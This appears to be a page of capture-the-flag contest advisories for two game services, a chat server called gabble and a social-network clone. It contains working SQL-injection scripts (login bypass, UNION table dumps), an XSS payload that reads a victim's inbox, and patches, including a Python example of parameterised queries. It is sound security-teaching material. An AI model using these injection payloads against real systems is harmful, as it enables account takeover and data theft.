{
minDist = distance;
name = fi.Name.Substring(0, 1);
}
 
}
System.Console.Write(name);
 
 
}
 
 
 
 
 
/*
 
* generate bitmaps
*
*
Image[] chars = new Image[32];
 
for (int i = 0; i < 32; i++)
{
Image singleChar = new Bitmap(10, 12 );
Graphics gg = Graphics.FromImage(singleChar);
gg.DrawImage(sectionImg, -i*9, 0);
 
chars[i] = singleChar;
 
chars[i].Save("qqq"+(i+1)+".jpg");
}
 
 
 
 
 
 
 
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new Form1(sectionImg));
*
*
* */
}
 
public static int[] getRowNum(Bitmap srcImg, Bitmap charImg)
{
 
 
 
int charHeight = charImg.Height;
int charWidth = charImg.Width;
 
int rowNumb = -1;
int maxDist = charWidth * charHeight;
for (int i = 0; i < srcImg.Width - (charImg.Width - 1) * 32 ; i++)
{
 
int dist = getDistance(srcImg, charImg, i, 0);
if (dist < maxDist)
{
maxDist = dist;
rowNumb = i;
}
 
}
 
int[] result = new int[2];
result[0] = rowNumb;
result[1] = maxDist;
return result;
 
}
 
 
 
 
 
public static int getStringNum(Bitmap srcImg, Bitmap charImg)
{
int srcHeight = srcImg.Height;
int charHeight = charImg.Height;
int srcWidth = srcImg.Width;
int charWidth = charImg.Width;
 
int stringMin = charWidth * charHeight;
int stringNum = -1;
 
for (int j = 0; j < srcHeight - charHeight; j++)
{
int maxDist = srcWidth * srcHeight;
for (int i=0; i < srcWidth - charWidth; i++){
 
int dist = getDistance(srcImg, charImg, i , j);
if (dist < maxDist)
maxDist = dist;
}
if (maxDist < stringMin)
{
stringMin = maxDist;
stringNum = j;
}
 
 
}
return stringNum;
 
 
}
 
public static int getDistance(Bitmap bb, Bitmap b2, int x, int y)
{
int result = 0;
for (int i = 0; i < b2.Height; i++)
{
for (int j = 0; j < b2.Width; j++)
{
result += (int)(Math.Abs((bb.GetPixel(x+j, y+i).GetBrightness() - b2.GetPixel(j, i).GetBrightness())));
}
}
return result;
}
 
 
}
}
 
Patch
Make flag text crazy :)
 
********************* Advisory 141, Defender of the Flag on gabble
 
Scored: 1
Submitted: 0:56:15 2.8.2008
Published: 1:26:15 2.8.2008
 
Judge tilo said: just a sql injection, but extensive exploit & patch
 
Advisory
The gabble service is similar to ICQ: you can add users, add buddies, change your status and set notice messages. To connect to the server you use the gabbler client. We will demonstrate how to log on without a password using an SQL injection. This enables us to infringe users' privacy and steal the data related to the account.
 
Exploit
Sending the following packet for authentication allows you to bypass authentication. You will be logged on with an arbitrary user account:
 
use IO::Socket;

use constant TIMEOUT => 2;
$sock = new IO::Socket::INET(PeerAddr => $ARGV[0],
                             PeerPort => 4000,
                             Proto    => 'tcp', Timeout => TIMEOUT)
    or die "can't connect to $ARGV[0]:$ARGV[1]: $@\n";

print $sock "\x02x\x27 or 1=1-- \xffp\xff";    # fake authentication
read $sock, $contents, 20;
print $sock "!(null)\xff(null)\xff\x33\xff";   # retrieve buddies (with FLAGS)
read $sock, $contents, 400000;
print "CONTENT2S: $contents";                   # contains FLAGS
 
 
The opcode 2 starts logging on, the username supplied is "x' OR 1=1-- " with any password (e.g. 'p'). After that you use opcode 33 (Hex 0x21 aka "!") in order to retrieve the buddy list. After that the server sends the buddy list containing flags.
 
 
Patch
Affected is the function dbIsValidPassword, cf. line 72 in database.c. Add checks to prevent SQL injection:
 
if(checkSQLString(user)!=0 || checkSQLString(password)!=0)
return 0;
 
 
Use the following validation function:
int checkSQLString(char* string){
    /* strchr() takes a character, not a string literal, and the original fell
       off the end without a return value when # or ` was found. */
    if (strchr(string, '\'') != NULL) return -1;
    if (strchr(string, '#') != NULL) return -1;
    if (strchr(string, '`') != NULL) return -1;
    return 0;
}
 
********************* Advisory 143, Flux Fingers on myspray
 
Scored: 2
Submitted: 0:56:38 2.8.2008
Published: 1:26:38 2.8.2008
 
Judge tilo said: xss, but extensive exploit
 
Advisory
MySpray is a clone of a well-known German social network. Every user has their own profile page, including information about them.
By entering malicious data, an adversary would be able to steal cookies (this is new!), since the gameserver is rendering JavaScript :)
 
 
Exploit
The following JavaScript code would have to be put in one of the XSS-enabled form fields (see our previous advisory)
 
This example performs an XMLHttpRequest and lets the gameserver read/filter flags from the inbox (the pinboard just needs a slightly different RegExp).
 
 
regex = /^.*([a-z0-9]{32}).*$/g;
var req = new XMLHttpRequest();
req.open('GET', 'https://10.1.<VICTIM>.3/myspray/inbox.html', true);
req.onreadystatechange = function (aEvt) {
    if (req.readyState == 4) {
        if (req.status == 200) {
            f = "";
            alert(req.responseText);
            var match = req.responseText.match(regex);   // the original snippet used match without computing it
            alert(match[0]);
            for (j = 0; j < match.length; j++) { f += match[j] };
            alert(f);
        };
    }
};
req.send(null);
 
Patch
Like before - filter input with htmlspecialchars() in the view.py :)
 
********************* Advisory 144, HackerDom on gabble
 
Scored: 2
Submitted: 0:56:51 2.8.2008
Published: 1:26:51 2.8.2008
 
Judge tilo said: .
 
Advisory
SQL injection in query (database.c):
 
sprintf(query,"SELECT password FROM users WHERE name='%s' AND password='%s'",user,password);
 
allows selecting arbitrary rows from other tables.
 
Patch filters out words 'SELECT', 'UPDATE' and 'INSERT' in TCP stream.
 
To use patch, bind your gabble server to another port (4001 in our case)
 
Exploit
#!/usr/bin/perl

use strict;
use Socket;

# one request: opcode byte, then each field terminated by 0xff
sub say {
    my $buf = sprintf "%c%s\xFF%s\xFF", @_;
    send S, $buf, 0;
    sleep 1;

    recv S, my $answ, 102400, 0;
    $answ;
}

my $a_hex = '0123456789abcdef';
my $a_big = 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm/.';

my $h = shift or die "usage: gfuck.pl <ip> [port]\n";
my $p = shift || 4000;

socket S, PF_INET, SOCK_STREAM, 0 or die "socket: $!, died";
my $a = inet_aton $h or die "inet_aton: $!, died";
connect S, sockaddr_in $p, $a or die "connect: $!, died";


# tilob99a95745bd3d7e4 | $1$b99a9574$HYoCLu5iwvvv9vqhAZ.yf/

my $u = genuser( );
my $pass = genpass( );   # was a second "my $p", which masked the port variable

print "u = $u, p = $pass\n";

say 1, $u, $pass;
say 2, $u, $pass;

flags( say 22, "' UNION SELECT buddy from buddies where ''='" );
flags( say 22, "' UNION SELECT awaymessage from users where ''='" );
flags( say 22, "' UNION SELECT message from offlinemessages where ''='" );

sub genuser {
    'tilob' . rndstr( $a_hex, 15 );
}

sub genpass {
    '$1$' . rndstr( $a_hex, 8 ) . '$' . rndstr( $a_big, 22 );
}

sub rndstr {
    my ( $alf, $len ) = @_;
    my $r = '';
    $r .= substr( $alf, int rand length $alf, 1 ) for 1 .. $len;
    $r;
}

sub flags {
    print " --- \n";
    print "$_\n" for pop =~ /H([0-9a-f]{32})\xFF/g;
}
 
 
 
Patch
#!/usr/bin/perl
 
use strict;
use Socket;
 
++$|;
 
$SIG{CHLD} = 'IGNORE';
 
my $cip; # client ip
my $dir_num = 0;
my $dir_name; # dir name for dumps (for given child process)
my $file_num = 0;
 
# ---------- config ------------
 
my $LOCAL_HOST = '0.0.0.0';
my $LOCAL_PORT = 4000;
 
my $REMOTE_HOST = '10.1.31.3';
my $REMOTE_PORT = 4001;
 
my $BUF_SZ = 1024*1024;
 
my $DUMP = 1; # 0/1 - disable/enable dumping all traffic to files
my $DUMP_DIR = 'dump';
 
my $OUT = 1; # 0/1 - disable/enable output of packets to STDERR
 
# ------- subroutines ----------
 
sub say {
my $s = sprintf shift(), @_;
my $pid = sprintf "%5d", $$;
 
print localtime() . " | ";
# print "$cip | " if $cip; # this info is contained in $dir_name
print "$dir_name | " if $dir_name;
print $s.$/;
}
 
sub save {
my $file_name = sprintf "%06d_%s", ++$file_num, shift();
 
open DMP, "> $dir_name/$file_name" or die "open: $!, died";
syswrite DMP, shift();
close DMP;
}
 
# ---------- main --------------
 
if ( $DUMP ) {
 
say "dumping enabled, dir: '$DUMP_DIR'";
 
# Create dir for dumps
 
-d $DUMP_DIR or mkdir $DUMP_DIR or die "mkdir: $!, died";
 
# Determine last dir number
 
for ( <$DUMP_DIR/*> )
{
m|/(\d+)| or next;
$1 > $dir_num and $dir_num = $1;
}
 
$dir_num += 1;
say "dir_num will be started from %06d", $dir_num;
}
else {
say "dumping disabled";
}
 
say "remote $REMOTE_HOST:$REMOTE_PORT";
 
# L - listening socket. it will accept connections on this machine
 
socket L, PF_INET, SOCK_STREAM, 0 or die "socket: $!, died";
setsockopt L, SOL_SOCKET, SO_REUSEADDR, 1 or die "setsockopt: $!, died";
my $local_pkd = inet_aton $LOCAL_HOST or die "inet_aton: $!, died";
bind L, sockaddr_in $LOCAL_PORT, $local_pkd or die "bind: $!, died";
listen L, 10 or die "listen: $!, died";
 
say "listening $LOCAL_HOST:$LOCAL_PORT";
 
while ( 1 ) {
 
my $c = accept C, L or die "accept: $!, died";
 
my ( $c_port, $c_pkd ) = sockaddr_in $c;
my $c_ip = inet_ntoa($c_pkd);
$cip = "$c_ip:$c_port";
 
if ( $DUMP ) {
 
 
mkdir ( $dir_name = sprintf "$DUMP_DIR/%06d_%s_%s", $dir_num++, $c_ip, $c_port ) or die "mkdir: $!, died";
 
open INFO, "> $dir_name/info.txt";
print INFO "client: $cip$/";
print INFO "server: $REMOTE_HOST:$REMOTE_PORT$/";
close INFO;
}
 
my $f = fork();
# $f >= 0 or die "fork: $!, died"; # uncomment on *nix
 
if ( $f == 0 )
{
close L;
say "child process started";
child_process( );
say "child process finished\n";
exit;
}
 
close C;
}
 
 
sub child_process
{
# Connecting to REMOTE_HOST : REMOTE_PORT
 
socket S, PF_INET, SOCK_STREAM, 0 or die "socket: $!, died";
my $remote_pkd = inet_aton $REMOTE_HOST or die "inet_aton: $!, died";
connect S, sockaddr_in $REMOTE_PORT, $remote_pkd or die "connect: $!, died";
 
say "connected to $REMOTE_HOST:$REMOTE_PORT";
 
while ( 1 )
{
vec( my $rin, fileno(S), 1 ) = 1;
vec( $rin, fileno(C), 1 ) = 1;
 
select( $rin, undef, undef, undef );
 
if ( vec $rin, fileno(S), 1 ) # some data: S -> C
{
recv S, my $buf, $BUF_SZ, 0;
length($buf) or say "server closed connection" and last;
 
length($buf) >= 128 and print " >> NO BOF! \n" and $buf = '';
 
save 's', $buf if $DUMP;
syswrite STDERR, $buf.$/ if $OUT;
 
send C, $buf, 0;
say "S -> C (%d b)", length $buf;
}
 
if ( vec $rin, fileno(C), 1 ) # some data: S <- C
{
recv C, my $buf, $BUF_SZ, 0;
length($buf) or say "client closed connection" and last;
 
save 'c', $buf if $DUMP;
syswrite STDERR, $buf.$/ if $OUT;
 
length($buf) >= 128 and print " >> NO BOF! \n" and $buf = '';

if ($buf =~ /(SELECT)|(UPDATE)|(INSERT)/i){
my $hackers = "\n\n !!!FUCKING HACKERS!!!\n\n";
syswrite STDERR, $hackers;
 
}
else{
say "S <- C (%d b)", length $buf;
send S, $buf, 0;
}
}
}
}
 
 
********************* Advisory 145, SiBears on gabble
 
Scored: 1
Submitted: 0:59:21 2.8.2008
Published: 1:29:21 2.8.2008
 
Judge tilo said: .
 
Advisory
We could try to read offline messages from the user with the name "' OR 'A' = 'A" (without double quotes). Two functions, dbGetOfflineMessages() and dbUserExists(), will insert this name without filtering; both queries will be successful and will return the full content of the tables.
 
Exploit
this sequence of messages allows you to read contents of 'offlinemessages' table:
 
1|somename|somepass;
2|somename|somepass;
22|' OR 'A' = 'A;
 
Patch
filter all quotes ;)
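
The gabble requests that advisories 126, 141, 144 and 145 send, and why the injected names work, shown as an added example in Python; it is not part of any team's code and not gabble's own source. The packet layout (opcode byte, then each field followed by 0xff) and the opcode values 1/2/22 are taken from the exploits on this page; the table columns beyond those the advisories name, the sample rows and the SQLite stand-in for MySQL are constructed assumptions. The sprintf-style queries are the vulnerable form from database.c, placed next to the parameterised form that closes the hole; union_blocklisted reproduces the strstr(query, "UNION") check from advisory 126's patch so its case-sensitivity can be seen.

```python
import sqlite3

# Opcodes as the exploits on this page use them: 1 = new user, 2 = login,
# 22 = fetch offline messages (advisories 144 and 145).
OPCODE_NEWUSER, OPCODE_LOGIN, OPCODE_GETOFFLINE = 1, 2, 22


def create_packet(opcode, fields):
    """Build a gabble request: one opcode byte, then each field followed by 0xff.

    Assumed from the exploits' sprintf("%c%s<0xff>%s<0xff>"); the real client
    is not on the page.
    """
    return bytes([opcode]) + b"".join(f.encode("latin-1") + b"\xff" for f in fields)


def parse_packet(data):
    """Inverse of create_packet(): returns (opcode, [field, ...])."""
    body = data[1:]
    if not body.endswith(b"\xff"):
        raise ValueError("unterminated field")
    return data[0], [f.decode("latin-1") for f in body[:-1].split(b"\xff")]


def constructed_db():
    """SQLite stand-in for gabble's MySQL tables, with constructed sample rows.

    Column names other than the ones the page quotes (name, password,
    awaymessage, message) are assumptions.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (name TEXT, password TEXT, awaymessage TEXT);
        CREATE TABLE offlinemessages (name TEXT, message TEXT);
        INSERT INTO users VALUES ('tilo',  'secret',  'AWAY_FLAG_TILO');
        INSERT INTO users VALUES ('alice', 'hunter2', 'AWAY_FLAG_ALICE');
        INSERT INTO offlinemessages VALUES ('tilo',  'OFFLINE_FLAG_TILO');
        INSERT INTO offlinemessages VALUES ('alice', 'OFFLINE_FLAG_ALICE');
    """)
    return conn


def offline_messages_vulnerable(conn, user):
    """The database.c pattern: the user-supplied name is sprintf'd into the SQL."""
    query = "SELECT message FROM offlinemessages WHERE name='%s'" % user
    return sorted(row[0] for row in conn.execute(query))


def offline_messages_fixed(conn, user):
    """Same lookup with a bound parameter: quotes in `user` are data, not syntax."""
    rows = conn.execute("SELECT message FROM offlinemessages WHERE name=?", (user,))
    return sorted(row[0] for row in rows)


def password_valid_vulnerable(conn, user, password):
    """dbIsValidPassword as advisory 144 quotes it (string-built query)."""
    query = ("SELECT password FROM users WHERE name='%s' AND password='%s'"
             % (user, password))
    return conn.execute(query).fetchone() is not None


def password_valid_fixed(conn, user, password):
    """Parameterised variant of the same check."""
    sql = "SELECT password FROM users WHERE name=? AND password=?"
    return conn.execute(sql, (user, password)).fetchone() is not None


def union_blocklisted(field):
    """The strstr(query, "UNION") test from advisory 126's patch: a case-sensitive
    substring match, so a lower-case keyword passes it unchanged."""
    return "UNION" in field


if __name__ == "__main__":
    db = constructed_db()
    inject = "' UNION SELECT message from offlinemessages where ''='"
    opcode, (field,) = parse_packet(create_packet(OPCODE_GETOFFLINE, [inject]))
    print("opcode %d, vulnerable:" % opcode, offline_messages_vulnerable(db, field))
    print("fixed:", offline_messages_fixed(db, field))
    print("login bypass:", password_valid_vulnerable(db, "x' or 1=1-- ", "p"))
```

The two "fixed" functions are the whole patch: with a bound parameter the quote and the UNION in the name never reach the SQL parser, so no keyword list is needed, and the quoting trick from advisory 145 and the comment trick from advisory 141 fail for the same reason.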